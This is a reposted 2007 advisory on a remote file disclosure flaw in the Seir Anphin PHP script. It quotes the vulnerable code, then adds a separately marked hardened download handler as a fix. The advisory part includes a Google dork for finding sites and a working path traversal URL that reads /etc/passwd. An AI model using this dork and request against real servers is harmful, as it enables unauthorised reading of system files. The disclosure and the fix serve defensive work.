Computer Security
[EN] securityvulns.ru

From: ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date: 29.04.2007
Subject: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability

----------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...



Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:   */AYYILDIZ was here when you were not.*/
----------------------------------------------------------------------------------
Bug:
               exit();
               header("Content-Disposition: attachment; filename=\"$filename\"");
               header('Content-Length: ' . filesize($a['filepath']));
               readfile($a['filepath']);
               exit();

----------------------------------------------------------------------------------

Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd

----------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG
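
Added example, not part of the original advisory and not Seir Anphin code: the "Bug" excerpt hands $a['filepath'] directly to filesize() and readfile(), so a hardened handler would canonicalise the requested path and refuse anything outside a fixed download directory. DOWNLOAD_ROOT, resolve_download() and send_download() are hypothetical names, and the directory and sample file name are constructed values.

```php
<?php
// Added example: hypothetical hardened download helper (not Seir Anphin code).
// DOWNLOAD_ROOT is an assumed storage directory for downloadable files.
const DOWNLOAD_ROOT = '/var/www/anphin/files';

/**
 * Resolve a requested relative path to a real file inside $root.
 * Returns null if the file is missing or the path escapes the root.
 */
function resolve_download(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ sequences and symlinks; false if missing.
    $full = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Compare against the root plus a trailing separator, so that a
    // sibling such as /files-private does not pass as /files.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

function send_download(string $requested): void
{
    $path = resolve_download(DOWNLOAD_ROOT, $requested);
    if ($path === null) {
        http_response_code(404);
        exit();
    }
    // Build the header from the resolved basename, without quote/CR/LF.
    $filename = str_replace(['"', "\r", "\n"], '', basename($path));
    header('Content-Type: application/octet-stream');
    header("Content-Disposition: attachment; filename=\"$filename\"");
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit();
}

// $a is initialised by the script itself, never populated from the request.
$a = ['filepath' => 'manual.pdf']; // constructed sample value
send_download($a['filepath']);
```

With this check, a value such as ../../../etc/passwd canonicalises to a path outside DOWNLOAD_ROOT and the handler answers 404 instead of reading the file.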
